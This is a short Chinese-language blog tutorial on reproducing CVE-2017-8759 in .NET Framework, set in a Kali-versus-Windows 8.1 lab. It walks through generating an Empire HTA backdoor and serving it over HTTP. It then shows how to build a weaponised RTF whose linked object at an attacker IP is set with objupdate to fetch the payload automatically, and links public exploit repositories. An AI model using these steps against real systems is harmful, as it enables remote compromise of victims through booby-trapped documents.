最新CVE-2017-8759漏洞復現的兩種姿勢
GIF/41K
大家好,我是你們的老朋友Alex。今天教大家復現漏洞CVE-2017-8759
https://github.com/vysec/CVE-2017-8759
該漏洞影響所有主流的.NETFramework版本
Microsoft .NET Framework4.6.2
Microsoft .NET Framework4.6.1
Microsoft .NET Framework3.5.1
Microsoft .NET Framework4.7
Microsoft .NET Framework4.6
Microsoft .NET Framework4.5.2
Microsoft .NET Framework3.5
Microsoft .NET Framework 2.0 SP2
詳細漏洞細節鏈接:http://www.freebuf.com/articles/system/147602.html
環境:
Kali linux IP:192.168.1.118
Win8.1靶機IP:192.168.1.19(OFFICE2013)
在kali中使用Empire生成HTA後門
修改exploit.txt文件
開啟apache或者使用python -m SimpleHTTPServer建立鏈接
並且把HTA上傳到同一路徑下。
然後使用word新建一個rtf,插入一個鏈接到文件的對象http://192.168.1.118:808/exploit.txt
然後使用C32編輯blob.bin,修改位置如下
右鍵拷貝HEX格式所有,使用編輯器打開rtf文件替換代碼
再將objautlink前插入objupdate
保存修改後我們測試一下效果!
(o゜゜)o[BINGO!]
還有一種利用姿勢就是使用宏來載入HTA文件,項目地址:
https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
ByeBye~


※一個換行符引發的奧斯卡0day漏洞復現
※遠程連接埠被修改如何查找
※建網站不維護遭黑客攻擊 開辦單位被罰20000元
TAG:黑白之道 |